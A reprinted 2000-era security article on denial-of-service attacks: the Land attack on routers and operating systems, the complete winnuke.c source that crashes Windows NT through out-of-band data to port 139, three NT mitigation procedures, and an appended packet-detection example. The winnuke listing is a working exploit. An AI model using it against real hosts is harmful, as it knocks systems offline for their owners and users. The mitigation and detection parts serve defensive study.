Attack by handling program errors (below)

Source: Internet
Author: User
Created on: 2000-06-03
Article attributes: Reprinted
Source: Red Power
Article submitted: xundi (xundi_at_xfocus.org)

Repost from the Red Power-see our connection
3 land attack tools

Land is also a very powerful attack tool. Someone used Land to test a certain router and found that when port 23 was attacked, the router could no longer connect to the local network or to outside networks. The light on the front panel also stopped flashing, the router did not respond to ping, and the telnet command did not work either. At that point, the only choice was a hard restart. The following is a description of the Land attack on a Cisco router:

"When port 23 is attacked, it actually locks the router. At this time, the router can no longer reach the internal LAN, nor can it reach the external network. The light on the front panel also stops flashing. At this time, you cannot ping it or telnet to it. The only choice is a hard restart."

This is terrible for many networks that use Cisco routers.

Some people have used Land to test popular operating systems. The results show that Land's targets include a considerable number of operating systems, such as AIX 3, HP-UX 10.20, IRIX, Windows 95 and Windows NT.

More dangerous is that the source code of attack programs such as teardrop.c, bonk.c (port 55), boink.c, and ssping.c is everywhere on the Internet today, ranging from well-written programs to simple test programs that people have put together themselves. Anyone interested can spend a little time studying them and turn them into their own tools. Therefore, if your system is not up to date or has not been patched, it is imperative to patch it.

4 OOB attack tools

5.1 attack code

OOB is a tool used to attack port 139 of Windows NT. The following is a usable version. You can use it to test the security of your own system.

    /* winnuke.c - (05/07/97) by _eci */
    /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/socket.h>

    #define dport 139 /* attack port; 139 is what we want */

    int x, s;
    char *str = "bye"; /* makes no diff */
    struct sockaddr_in addr, spoofedaddr;
    struct hostent *host;

    /* Resolve server and connect sock to server:port.
       Returns 0 on success or a negative error code. */
    int open_sock(int sock, char *server, int port) {
        struct sockaddr_in blah;
        struct hostent *he;

        bzero((char *)&blah, sizeof(blah));
        blah.sin_family = AF_INET;
        blah.sin_addr.s_addr = inet_addr(server);
        blah.sin_port = htons(port);

        if ((he = gethostbyname(server)) != NULL) {
            bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
        }
        else {
            if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
                return (-3);
            }
        }

        if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) == -1) {
            perror("connect()");
            close(sock);
            return (-4);
        }
        return 0;
    }

    int main(int argc, char *argv[]) {
        if (argc != 2) {
            printf("Usage: %s <target>\n", argv[0]);
            exit(0);
        }

        if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
            perror("socket()");
            exit(-1);
        }

        open_sock(s, argv[1], dport);
        printf("sending crash ...");
        /* MSG_OOB sends the data as TCP urgent (out-of-band) data */
        send(s, str, strlen(str), MSG_OOB);
        usleep(100000);
        printf("done!\n");
        close(s);
        return 0;
    }

10.5.2 some temporary measures

Currently, three temporary solutions are available. The consequence of the first two is that users can only use dial-up networking, not the LAN. The third method blocks access to port 139 through packet filtering. Because it requires support from the NIC, it can only be used inside the LAN.

Method 1:

1. Go to the [Control Panel] window --- [network] dialog box --- [binding] tab.

2. Open the [show bound to] list and select [All adapters].

3. Find [Remote Access WAN Wrapper], open it, and find [WINS Client (TCP/IP)].

4. Click the [disable] button.

5. After confirmation, restart the system.

Note that when you log on to Windows NT 4.0, a message box is displayed, indicating that some services or drivers were not started. This is normal, and will occur at each startup.

Method 2:

1. Go to the [Control Panel] and find the [device] icon.

2. Go to the bottom of the list and find [WINS Client (TCP/IP)].

3. Click the [Stop] button and then click the [close] button.

4. restart the system.

This method achieves the same result as the first one more concisely, but it is a disaster for LAN clients that use WINS TCP/IP. Therefore, contact the system administrator to determine whether this operation is necessary.

Method 3:

Windows NT 4.0 provides an option to filter ports. This can be used to filter packets whose destination port is 139. Be aware that this method will have unwanted side effects on the use of NetBIOS.

1. Go to the [Control Panel], select [network]/[Protocol]/[TCP/IP] and click [properties].

2. In the IP address table, select [advanced].

3. In the [advanced] TCP/IP properties dialog box, select which ports to block and which ports to continue using.

4. Click [OK] and then exit and restart the system.
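
The condition that Method 3's port filter approximates can also be written as packet inspection. The following is an added example, not part of the original article: it flags TCP segments to port 139 that carry the URG flag (what send() with MSG_OOB produces in the listing above) and, going beyond the listing, the Land pattern of a SYN whose source address and port equal the destination's. The function names, verdict codes and sample packets (192.0.2.x addresses) are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PKT_OK, PKT_MALFORMED, PKT_URG_TO_139, PKT_LAND };

/* Classify one raw IPv4 packet, starting at the IP header. */
enum verdict classify(const uint8_t *p, size_t len) {
    if (len < 20 || (p[0] >> 4) != 4) return PKT_MALFORMED;
    size_t ihl = (size_t)(p[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > len) return PKT_MALFORMED;
    if (p[9] != 6) return PKT_OK;                 /* only TCP is inspected */
    if (len - ihl < 20) return PKT_MALFORMED;     /* truncated TCP header */
    const uint8_t *t = p + ihl;
    uint16_t sport = (uint16_t)((t[0] << 8) | t[1]);
    uint16_t dport = (uint16_t)((t[2] << 8) | t[3]);
    uint8_t flags = t[13];
    /* Land: SYN whose source address and port equal the destination's. */
    if ((flags & 0x02) && sport == dport && memcmp(p + 12, p + 16, 4) == 0)
        return PKT_LAND;
    /* send(..., MSG_OOB) sets URG; 139 is the dport of the listing above. */
    if ((flags & 0x20) && dport == 139) return PKT_URG_TO_139;
    return PKT_OK;
}

/* Constructed sample: a 40-byte IPv4 + TCP header pair with no payload. */
size_t sample(uint8_t *b, uint32_t src, uint32_t dst,
              uint16_t sport, uint16_t dport, uint8_t flags) {
    memset(b, 0, 40);
    b[0] = 0x45; b[3] = 40; b[8] = 64; b[9] = 6;  /* IPv4, IHL 5, TTL, TCP */
    for (int i = 0; i < 4; i++) {
        b[12 + i] = (uint8_t)(src >> (24 - 8 * i));
        b[16 + i] = (uint8_t)(dst >> (24 - 8 * i));
    }
    b[20] = (uint8_t)(sport >> 8); b[21] = (uint8_t)sport;
    b[22] = (uint8_t)(dport >> 8); b[23] = (uint8_t)dport;
    b[32] = 0x50; b[33] = flags;                  /* data offset 5, flags */
    return 40;
}

int main(void) {
    uint8_t b[40];
    const uint32_t A = 0xC0000201, B = 0xC000020A; /* 192.0.2.1, 192.0.2.10 */
    printf("%d\n", classify(b, sample(b, A, B, 40000, 139, 0x18))); /* PSH|ACK */
    printf("%d\n", classify(b, sample(b, A, B, 40000, 139, 0x38))); /* URG set */
    printf("%d\n", classify(b, sample(b, B, B, 139, 139, 0x02)));   /* Land */
    return 0;
}
```
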
